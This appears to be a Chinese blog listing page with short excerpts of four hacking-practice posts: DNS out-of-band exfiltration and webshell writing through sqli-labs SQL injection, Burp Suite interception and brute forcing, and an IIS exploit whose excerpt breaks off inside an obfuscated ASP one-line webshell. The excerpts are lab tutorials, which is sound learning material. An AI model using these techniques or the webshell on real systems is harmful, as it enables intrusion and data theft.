web
快递小锅
以加油结束,以加油开始
展开
-
通过sqli-labs-master第八关完成dns带外攻击回显
1.利用dns缓存原理找到数据(dnslog平台查询)2.在mysql里面获取想要的参数(load_file() 读取文件函数 version() 版本信息函数)concat() 多列合并到一起1.txt是文件名(可以新创一个,主要是让函数生效) ,可以把一整个理解成是localhost\\1.txt,前面是网站路径,是在这个路径里面拿文件,这样版本号就出来了...原创 2020-01-09 00:29:12 · 608 阅读 · 1 评论 -
通过sqli-labs-master第二关完成木马上传
写入一句话木马条件一.写权限 写文件 Into Outfile into Dumpfile二.需要知道网站绝对路径如何确定网站绝对路径 @@basedir @@datadir1.判断注入漏洞,是数值型注入2.判断显示位之后,...原创 2020-01-08 23:25:48 · 412 阅读 · 0 评论 -
Burp Suite 使用
利用火狐进行拦截Proxy 代理拦截开关 on 打开 off 关闭Forward 下一步Drop 停止拦截Action 相当于鼠标右键置于on利用FoxyProxy插件快捷打开代理以百度为例,进行拦截Intruder 入侵(爆破)以下面php文件为例$us...原创 2020-01-02 23:47:51 · 260 阅读 · 0 评论 -
利用http漏洞获取权限
环境:一台win3虚拟机 一台物理机1. 保证物理机和虚拟机在同一网段且能相互ping通2.在虚拟机上安装iis服务器3.开放权限4.在物理机桌面建立一个txt文件,里面内置木马 如:1.txt<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)...原创 2019-12-31 00:14:35 · 667 阅读 · 0 评论